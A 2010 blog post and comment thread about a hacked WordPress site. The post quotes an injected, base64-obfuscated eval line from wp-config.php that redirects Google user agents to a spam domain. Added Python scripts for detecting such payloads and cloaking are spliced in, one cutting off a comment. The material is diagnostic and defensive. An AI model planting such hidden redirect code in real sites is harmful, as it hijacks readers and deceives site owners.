Blog hacked? UPDATED

This blog appears to have been hacked somehow.

This is my old blog and apart from a test posting the other day, I hadn’t added any new posts since May 2009.

Blog posts

However, when you view this blog’s feed in Google Reader it appears to be full of spammy posts.

Spammy posts in Google Reader

The spammy posts don’t show up when viewing the blog’s feed in Firefox (or Safari) RSS readers – it seems to be confined to Google Reader somehow.

Feed seen in Firefox

I also checked the backend mysql database and the spammy posts are not there, so I’m not sure where they are coming from.

I was using the FeedBurner Feedsmith plugin for handling this blog’s feeds, but I deactivated that over the weekend when I first became aware of this issue. I thought perhaps the FeedBurner feed had been hacked, so that if I turned it off any cached spam posts would be cleared out after a day or so; however, not only has the spam persisted, but more posts have been added.

Anyone have any idea how this is happening and what I can do to stop it?

UPDATE –

With help from Ewan, I discovered (after looking around at a lot of other files) that the wp-config.php file had been edited. The following line had been added:

eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmVnaSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));
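As an added example (not code from the post), a small Python triage scanner for exactly this kind of injection: it finds eval(base64_decode('...')) calls in a PHP tree, tolerates the line wrapping of the literal seen above, decodes the payload and lists the PHP functions it calls, alongside each file's modification time so recently altered files stand out. Decoding the line above with it recovers a snippet that reads $_SERVER['HTTP_USER_AGENT'] and, for any agent matching "google", sends a 301 redirect to http://bablo.me.uk/, which is the behaviour Ewan describes in the comments. Everything here is standard library; the wp-config.php fragment is a constructed sample built around the quoted line.

```python
"""Triage scanner for injected eval(base64_decode(...)) lines in a PHP tree."""
import base64
import os
import re
import sys
import time
from dataclasses import dataclass, field
from typing import List

# eval(base64_decode('...')) in either quote style; the base64 body may contain
# whitespace or line breaks, as the wrapped line found in wp-config.php does.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

# Strings whose presence in a decoded payload is worth pointing out to a human.
INDICATORS = (
    "HTTP_USER_AGENT", "header(", "Location:", "exit(", "eval(",
    "base64_decode(", "gzinflate(", "str_rot13(", "system(", "shell_exec(",
)


@dataclass
class Finding:
    path: str
    line_no: int
    mtime: str                  # file modification time (UTC) for triage ordering
    decoded: str                # payload after base64 decoding, or a marker
    indicators: List[str] = field(default_factory=list)


def decode_payload(b64: str) -> str:
    """Decode a base64 body, tolerating line wrapping inside the literal."""
    compact = re.sub(r"\s+", "", b64)
    return base64.b64decode(compact, validate=True).decode("utf-8", errors="replace")


def scan_source(path: str, source: str, mtime: float = 0.0) -> List[Finding]:
    """Return one Finding per eval(base64_decode(...)) occurrence in `source`."""
    stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(mtime))
    findings = []
    for m in EVAL_B64.finditer(source):
        try:
            decoded = decode_payload(m.group(2))
        except ValueError:      # binascii.Error is a ValueError subclass
            decoded = "<not valid base64>"
        line_no = source.count("\n", 0, m.start()) + 1
        hits = [tok for tok in INDICATORS if tok in decoded]
        findings.append(Finding(path, line_no, stamp, decoded, hits))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Scan every .php file under `root`; most recently modified files first."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    results.extend(scan_source(full, fh.read(), os.path.getmtime(full)))
            except OSError:
                continue
    return sorted(results, key=lambda f: f.mtime, reverse=True)


# Constructed sample: a wp-config.php fragment carrying the line quoted in the
# post, wrapped across three lines exactly as it appeared there.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmV
naSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxv
Y2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));
require_once(ABSPATH . 'wp-settings.php');
"""


def demo() -> List[Finding]:
    """Scan the constructed sample (real use: scan_tree('/path/to/wordpress'))."""
    return scan_source("wp-config.php (sample)", SAMPLE_WP_CONFIG)


if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for f in hits:
        print(f"{f.path}:{f.line_no}  mtime={f.mtime}  indicators={f.indicators}")
        print("    decoded:", f.decoded)
```

Run with the WordPress root as the only argument to scan a real install; with no argument it scans the constructed sample. The decoded text is printed rather than executed, so the scanner never runs anything it finds.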

To be safe, I FTP’d into the server, deleted the wp-config.php file and uploaded a clean one.

The site is now back to working as expected; apologies to anyone who was exposed to the spammy links.

I’ll now go back over the site again with the proverbial fine-toothed comb to see if I can find any other suspicious changes that were made to it.

9 thoughts on “Blog hacked? UPDATED”

  1. It looks like you’ve properly been hacked, some kind of SQL injection possibly, or, looking at some of your source code, maybe it’s the theme – there are definitely a couple of oddities in the theme itself.

    It looks like you’re already running WP 3.0.1, so the obvious answers are (in order of likelihood):

    Someone’s got your admin password via brute-force
    Someone’s got a backdoor via a theme or plugin you’re using
    Someone’s got a 0-day exploit for WordPress

    Realistically, I think someone with technical knowledge of WordPress security is going to need to log in to your server and take a look.

    1. Thanks Ewan,

      One of the reasons I’m confused, though, is that I don’t see the spam posts in the mysql db, nor are they in the posts listing in the WP backend.

      They don’t show up when the feed is viewed in most feed readers except Google Reader.

      I’ll try going to the default theme to see if that helps.

  2. Just to confirm it, I’ve looked at http://www.tomrafteryit.net/feed/ in Firefox with the default user-agent, then again with the user-agent set to

    FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)

    which is the Google Reader agent. When you view it with the FeedFetcher UA, the spammy posts appear.

  3. This is how it’s done: any requests using the FeedFetcher UA are given a 301 redirect to bablo.me.uk, which in turn redirects to a very spammy FeedBurner feed. Because FeedBurner caches your old stuff, it looks like the new things are being injected in place.

    So it’s almost certainly a theme or module hack.

    wget --user-agent="FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)" http://www.tomrafteryit.net/
    --2010-11-23 09:41:03--  http://www.tomrafteryit.net/
    Resolving www.tomrafteryit.net... 91.103.7.50
    Connecting to www.tomrafteryit.net|91.103.7.50|:80... connected.
    HTTP request sent, awaiting response... 301 Moved Permanently
    Location: http://bablo.me.uk/ [following]
    --2010-11-23 09:41:03--  http://bablo.me.uk/
    Resolving bablo.me.uk... 78.46.23.47
    Connecting to bablo.me.uk|78.46.23.47|:80... connected.
    HTTP request sent, awaiting response... 301 Moved Permanently
    Location: http://feeds.feedburner.com/ShadowCrushNews [following]
    --2010-11-23 09:41:04--  http://feeds.feedburner.com/ShadowCrushNews
    Resolving feeds.feedburner.com... 74.125.93.118
    Connecting to feeds.feedburner.com|74.125.93.118|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/xml]
    Saving to: `ShadowCrushNews'

    [
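The check Ewan carries out by hand in comments 2 and 3 (request the same URL with a browser User-Agent and with the FeedFetcher one, and compare what comes back without following redirects) is the standard way to detect User-Agent cloaking on your own site. Below is an added Python script that does the comparison; it is not code from the post or the thread. The FeedFetcher string is the one quoted above; the baseline browser and "Googlebot-like" agent strings are constructed, and cloaked_server is a constructed offline stand-in that reproduces the redirect behaviour described in the thread so the script can be run without a network.

```python
"""Differential User-Agent probe: fetch one URL under several User-Agent
strings without following redirects, and report any agent that receives a
different status or Location than the baseline browser request."""
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple

Response = Tuple[int, str]              # (HTTP status, Location header or "")
Fetcher = Callable[[str, str], Response]

# Baseline is a constructed browser string; FeedFetcher is the agent from the
# thread; the other two are constructed stand-ins for a crawler and a CLI tool.
BASELINE_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6 (constructed)"
PROBE_AGENTS = {
    "feedfetcher": "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)",
    "googlebot-like": "Mozilla/5.0 (compatible; Googlebot/2.1; constructed)",
    "curl": "curl/7.21.0",
}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the Location header is visible to us."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str, user_agent: str, timeout: float = 10.0) -> Response:
    """Live fetcher: status and Location for `url` under `user_agent`."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location", "")
    except urllib.error.HTTPError as err:     # unfollowed 3xx and 4xx/5xx land here
        return err.code, err.headers.get("Location", "")


def cloaked_server(url: str, user_agent: str) -> Response:
    """Constructed offline stand-in for the behaviour described in the thread:
    any User-Agent containing 'google' (case-insensitive) is sent a 301 to the
    spam domain, everyone else is served the real page."""
    if "google" in user_agent.lower():
        return 301, "http://bablo.me.uk/"
    return 200, ""


def probe(url: str, fetch: Fetcher = http_fetch) -> Dict[str, Response]:
    """Fetch `url` once per agent (baseline first) and return the raw results."""
    results = {"baseline": fetch(url, BASELINE_UA)}
    for label, ua in PROBE_AGENTS.items():
        results[label] = fetch(url, ua)
    return results


def cloaking_report(results: Dict[str, Response]) -> Dict[str, Response]:
    """Return only the agents whose (status, Location) differ from the baseline.
    An empty dict means the server answered every agent the same way."""
    base = results["baseline"]
    return {k: v for k, v in results.items() if k != "baseline" and v != base}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                 # live check against a site you operate
        diffs = cloaking_report(probe(sys.argv[1]))
    else:                                 # offline demonstration on the stand-in
        diffs = cloaking_report(probe("http://example.invalid/feed/", cloaked_server))
    if not diffs:
        print("no User-Agent dependent behaviour observed")
    for label, (status, location) in diffs.items():
        print(f"{label}: {status} {location or '(no Location)'}")
```

Because redirects are not followed, the first hop is what gets compared, which is where a cloaking redirect like the one in the wget transcript shows up; following redirects would have compared the final FeedBurner page instead and hidden the intermediate 301.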

  4. As well as changing the theme, I’ve now also changed the Admin password for the blog.

    Ewan – it sounds bizarre to me that just changing the user agent changes the displayed content, no?

  5. Only working for specific user-agents is typical masking; it makes it less obvious for you to spot as the site owner – if you didn’t subscribe to your own blog in Google Reader, would you have noticed until someone pointed it out to you?

    It’s still occurring now with the default theme, so I think it’s either a module or has been inserted into the WordPress code itself (or at the server level, which is much less likely but harder to fix).

  6. Have you disabled all the modules too?

    Poking around suggests that the hack might be at the Apache layer; can you see when your httpd.conf was last modified?

  7. I’ve disabled all the modules now except Akismet.

    Honestly, I’m not sure how to access the httpd.conf file – I did have a look at the .htaccess and I pulled a couple of lines from that, though I’m not sure they were responsible.
